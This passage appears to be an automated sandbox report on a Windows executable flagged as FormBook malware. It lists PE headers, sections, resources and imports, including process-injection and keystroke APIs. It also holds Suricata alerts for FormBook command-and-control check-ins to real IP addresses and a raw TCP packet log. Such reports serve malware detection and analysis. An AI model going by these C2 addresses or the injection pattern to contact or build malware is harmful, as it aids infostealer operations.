                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F3CDD7EB285h
                                                          bt esi, 03h
                                                          jnc 00007F3CDD7EB2D8h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x595ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x711c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc70000x595ac0x596002ecdbf4ef693503ae6300903bbd504d3False0.9269176136363636data7.891009570516618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1210000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcf7b80x50871data1.0003365257806034
                                                          RT_GROUP_ICON0x12002c0x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x1200a40x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x1200b80x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x1200cc0x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1200e00xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x1201bc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-10T23:05:40.618251+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949974188.114.97.380TCP
                                                          2025-01-10T23:05:40.618251+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949974188.114.97.380TCP
                                                          2025-01-10T23:05:56.553179+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949976208.91.197.2780TCP
                                                          2025-01-10T23:05:59.180842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949977208.91.197.2780TCP
                                                          2025-01-10T23:06:01.820857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949978208.91.197.2780TCP
                                                          2025-01-10T23:06:04.680350+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949979208.91.197.2780TCP
                                                          2025-01-10T23:06:04.680350+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949979208.91.197.2780TCP
                                                          2025-01-10T23:06:10.323108+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949980209.74.79.4080TCP
                                                          2025-01-10T23:06:12.867599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949981209.74.79.4080TCP
                                                          2025-01-10T23:06:15.416830+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949982209.74.79.4080TCP
                                                          2025-01-10T23:06:17.983468+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949983209.74.79.4080TCP
                                                          2025-01-10T23:06:17.983468+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949983209.74.79.4080TCP
                                                          2025-01-10T23:06:38.221913+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949984104.21.96.180TCP
                                                          2025-01-10T23:06:40.733955+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949985104.21.96.180TCP
                                                          2025-01-10T23:06:43.329442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949986104.21.96.180TCP
                                                          2025-01-10T23:06:45.893450+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949987104.21.96.180TCP
                                                          2025-01-10T23:06:45.893450+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949987104.21.96.180TCP
                                                          2025-01-10T23:06:59.672017+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949988144.76.229.20380TCP
                                                          2025-01-10T23:07:02.216873+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949989144.76.229.20380TCP
                                                          2025-01-10T23:07:04.806807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949990144.76.229.20380TCP
                                                          2025-01-10T23:07:07.337601+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949991144.76.229.20380TCP
                                                          2025-01-10T23:07:07.337601+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949991144.76.229.20380TCP
                                                          2025-01-10T23:07:13.062340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949992172.67.182.19880TCP
                                                          2025-01-10T23:07:15.602706+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949993172.67.182.19880TCP
                                                          2025-01-10T23:07:18.142286+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949994172.67.182.19880TCP
                                                          2025-01-10T23:07:20.696839+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949995172.67.182.19880TCP
                                                          2025-01-10T23:07:20.696839+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949995172.67.182.19880TCP
                                                          2025-01-10T23:07:26.218382+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94999613.248.169.4880TCP
                                                          2025-01-10T23:07:28.758948+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94999713.248.169.4880TCP
                                                          2025-01-10T23:07:31.325757+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94999813.248.169.4880TCP
                                                          2025-01-10T23:07:33.879744+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94999913.248.169.4880TCP
                                                          2025-01-10T23:07:33.879744+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.94999913.248.169.4880TCP
                                                          2025-01-10T23:07:40.376353+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.950000160.25.166.12380TCP
                                                          2025-01-10T23:07:42.946312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.950001160.25.166.12380TCP
                                                          2025-01-10T23:07:45.439322+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.950002160.25.166.12380TCP
                                                          2025-01-10T23:07:48.025418+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.950003160.25.166.12380TCP
                                                          2025-01-10T23:07:48.025418+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.950003160.25.166.12380TCP
                                                          2025-01-10T23:07:53.661162+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.95000468.66.226.11980TCP
                                                          2025-01-10T23:07:56.232725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.95000568.66.226.11980TCP
                                                          2025-01-10T23:07:59.240228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.95000668.66.226.11980TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 10, 2025 23:05:39.441587925 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:39.446764946 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:39.446883917 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:39.621166945 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:39.626931906 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:40.617919922 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:40.617949963 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:40.618251085 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:40.618408918 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:40.618468046 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:40.627832890 CET4997480192.168.2.9188.114.97.3
                                                          Jan 10, 2025 23:05:40.632639885 CET8049974188.114.97.3192.168.2.9
                                                          Jan 10, 2025 23:05:56.031416893 CET4997680192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:56.036359072 CET8049976208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:56.036515951 CET4997680192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:56.105657101 CET4997680192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:56.110431910 CET8049976208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:56.553066969 CET8049976208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:56.553179026 CET4997680192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:57.618988037 CET4997680192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:57.625082016 CET8049976208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:58.658497095 CET4997780192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:58.663322926 CET8049977208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:58.663431883 CET4997780192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:58.725145102 CET4997780192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:05:58.729984045 CET8049977208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:59.180785894 CET8049977208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:05:59.180841923 CET4997780192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:00.243725061 CET4997780192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:00.248512983 CET8049977208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:01.290150881 CET4997880192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:01.295015097 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:01.295092106 CET4997880192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:01.310235023 CET4997880192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:01.315098047 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:01.315125942 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:01.820760012 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:01.820857048 CET4997880192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:02.822051048 CET4997880192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:02.826966047 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:03.840934992 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.845838070 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:03.845933914 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.855287075 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.860109091 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680166006 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680180073 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680191040 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680201054 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680350065 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.680397987 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.683244944 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.688055038 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:09.714384079 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.719261885 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:09.719376087 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.734184027 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.738970041 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.322408915 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.323036909 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.323107958 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:11.243794918 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.267899036 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.272774935 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.272898912 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.294816971 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.299691916 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.865439892 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.867403984 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.867599010 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:13.806314945 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.825144053 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.830040932 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:14.830149889 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.845164061 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.849962950 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:14.850059986 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.413546085 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.413599968 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.416830063 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:16.353363037 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.372308969 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.377353907 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.377480030 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.386873007 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.391906023 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983237982 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983407021 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983468056 CET4998380192.168.2.9209.74.79.40
